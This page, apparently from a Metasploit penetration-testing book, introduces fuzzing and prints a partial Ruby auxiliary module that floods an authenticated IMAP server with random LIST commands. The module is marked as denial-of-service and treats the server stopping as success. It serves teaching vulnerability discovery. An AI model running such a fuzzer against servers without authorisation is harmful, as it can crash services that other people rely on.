198
Chapter 14
NOTE
This chapter assumes that you are familiar with exploit development and comfortable
with the concept of buffer overflows and the use of a debugger. If you need a bit of a
refresher, you’ll find some excellent tutorials by
corelanc0d3r
on the Exploit Database
site,
http://www.exploit-db.com/
. At a minimum, consider reading “Exploit
Writing Tutorial Part 1: Stack Based Overflows”
(http://www.exploit-db.com/
download_pdf/13535/)
and “Exploit Writing Tutorial Part 3: SEH”
(http://
www.exploit-db.com/download_pdf/13537/)
.
The Art of Fuzzing
Before you develop any exploit, you need to determine whether a vulnerabil-
ity exists in the application. This is where fuzzing comes into play.
The following listing shows the code for a simple Internet Message Access
Protocol (IMAP) fuzzer. Save this to your
/root/.msf3/modules/auxiliary/fuzzers/
directory, but be sure to keep your testing modules in a folder separate from
the main Metasploit trunk.
require 'msf/core'
class Metasploit3 < Msf::Auxiliary
include
Msf::Exploit::Remote::Imap
include
Msf::Auxiliary::Dos
def initialize
super(
'Name' => 'Simple IMAP Fuzzer',
'Description' => %q{
An example of how to build a simple IMAP fuzzer.
Account IMAP credentials are required in this
fuzzer.},
'Author' => [ 'ryujin' ],
'License' => MSF_LICENSE,
'Version' => '$Revision: 1 $'
)
end
def fuzz_str()
return Rex::Text.rand_text_alphanumeric(rand(1024))
end
def run()
srand(0)
while (true)
connected = connect_login()
if not connected
print_status(
"Host is not responding - this is G00D ;
)")
break
end
print_status("Generating fuzzed data...")
fuzzed = fuzz_str()
print_status("Sending fuzzed data, buffer length = %d" % fuzzed.length)
req = '0002 LIST () "/' + fuzzed + '" "PWNED"' + "\r\n"
print_status(req)